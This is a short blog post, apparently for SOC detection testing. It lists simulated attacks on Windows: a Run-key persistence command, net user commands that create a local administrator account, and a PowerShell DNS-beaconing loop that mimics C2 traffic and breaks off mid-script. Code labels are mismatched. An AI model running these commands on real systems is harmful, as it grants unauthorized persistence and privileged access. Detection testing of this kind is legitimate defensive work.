Azure Attack Sample
Azure Advertizer.net: How to Search Policy Compliance
Attack 1 - Run Registry Key
Attackers will add a program in the Run Registry key to achieve persistence. The program will run every time the user logs on.
bashREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat"
Attack 2 - User Add and Elevate Privilege
Attackers will add new users and elevate the new user to the Administrators group. This will enable the attacker to logon with a different account that is privileged.
sqlnet user theusernametoadd /add
net user theusernametoadd ThePassword1!
net localgroup administrators theusernametoadd /add
Attack 3 - Large Volume of DNS Queries
The attacker will send a large volume of DNS queries to a command and control (C2) server. The goal is to trigger threshold-based detection on the number of DNS queries either from a single source system or to a single target domain.
phpparam(
[string]$Domain = "microsoft.com",
[string]$Subdomain = "subdomain",
[string]$Sub2domain = "sub2domain",
[string]$Sub3domain = "sub3domain",
[string]$QueryType = "TXT",
[int]$C2Interval = 8,
[int]$C2Jitter = 20,
[int]$RunTime = 240
)
$RunStart = Get-Date
$RunEnd = $RunStart.addminutes($RunTime)
$x2 = 1
$x3 = 1
Do {
$TimeNow = Get-Date
Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
if ($x2 -eq 3 )
{
Resolve-DnsName -type $QueryType $Sub2domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
$x2 = 1
}
else
{
$x2 = $x2 + 1
}
if ($x3 -eq 7 )
{
Resolve-DnsName -type $QueryType
No comments:
Post a Comment